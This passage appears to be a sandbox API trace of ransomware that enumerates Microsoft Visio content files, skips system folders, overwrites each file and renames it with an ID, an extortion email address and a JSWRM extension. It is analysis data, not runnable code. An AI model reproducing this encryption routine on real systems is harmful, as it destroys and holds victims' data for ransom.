ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x156cc, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESEMI_VISIO2013_U.VSSX", cAlternateFileName="EESEMI~1.VSS")) returned 1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2=".") returned 1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="..") returned 1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="...") returned 1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="documents and settings") returned 1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0148.193] lstrcmpiW (lpString1="EESEMI_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0148.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x2412b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESEMI_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESEMI_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.197] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=87756) returned 1 [0148.197] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.197] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x156c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x156c0, lpOverlapped=0x0) returned 1 [0148.205] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.205] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x156c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x156c0, lpOverlapped=0x0) returned 1 [0148.206] CloseHandle (hObject=0x314) returned 1 [0148.206] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESEMI_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eesemi_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.207] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19fdec5, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x19fdec5, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1a96a42, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x37185, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESWCH_M.VSSX", cAlternateFileName="EESWCH~2.VSS")) returned 1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2=".") returned 1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="..") returned 1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="...") returned 1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="windows") returned -1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="recovery") returned -1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="perflogs") returned -1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="documents and settings") returned 1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="system volume information") returned -1 [0148.207] lstrcmpiW (lpString1="EESWCH_M.VSSX", lpString2="msocache") returned -1 [0148.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.208] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=225669) returned 1 [0148.208] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.209] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0148.221] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.221] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0148.222] CloseHandle (hObject=0x314) returned 1 [0148.222] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.223] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b09036, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1b09036, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1b09036, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x36899, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESWCH_U.VSSX", cAlternateFileName="EESWCH~3.VSS")) returned 1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2=".") returned 1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="..") returned 1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="...") returned 1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="windows") returned -1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="recovery") returned -1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="perflogs") returned -1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="documents and settings") returned 1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="system volume information") returned -1 [0148.223] lstrcmpiW (lpString1="EESWCH_U.VSSX", lpString2="msocache") returned -1 [0148.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.224] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=223385) returned 1 [0148.224] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.224] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0148.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.236] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0148.236] CloseHandle (hObject=0x314) returned 1 [0148.236] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.242] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x332cc84, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x332cc84, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x332cc84, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x24fda, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESWCH_VISIO2013_M.VSSX", cAlternateFileName="EESWCH~4.VSS")) returned 1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2=".") returned 1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="..") returned 1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="...") returned 1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="documents and settings") returned 1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0148.242] lstrcmpiW (lpString1="EESWCH_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0148.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x241380, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_M.VSSX", cchWideChar=23, lpMultiByteStr=0x241100, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.244] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=151514) returned 1 [0148.244] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.244] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x24fd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x24fd0, lpOverlapped=0x0) returned 1 [0148.257] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.257] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x24fd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x24fd0, lpOverlapped=0x0) returned 1 [0148.257] CloseHandle (hObject=0x314) returned 1 [0148.258] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.259] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ccc9d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x18ccc9d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x18f2ea7, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x231f9, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESWCH_VISIO2013_U.VSSX", cAlternateFileName="EESWCH~1.VSS")) returned 1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2=".") returned 1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="..") returned 1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="...") returned 1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="documents and settings") returned 1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0148.262] lstrcmpiW (lpString1="EESWCH_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0148.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0148.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EESWCH_VISIO2013_U.VSSX", cchWideChar=23, lpMultiByteStr=0x241178, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EESWCH_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 23 [0148.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.264] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=143865) returned 1 [0148.264] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.264] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x231f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x231f0, lpOverlapped=0x0) returned 1 [0148.350] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.350] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x231f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x231f0, lpOverlapped=0x0) returned 1 [0148.351] CloseHandle (hObject=0x314) returned 1 [0148.351] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EESWCH_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eeswch_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.354] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3d2d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EESYS_M.VSTX", cAlternateFileName="EESYS_~1.VST")) returned 1 [0148.354] lstrcmpiW (lpString1="EESYS_M.VSTX", lpString2=".") returned 1 [0148.354] lstrcmpiW 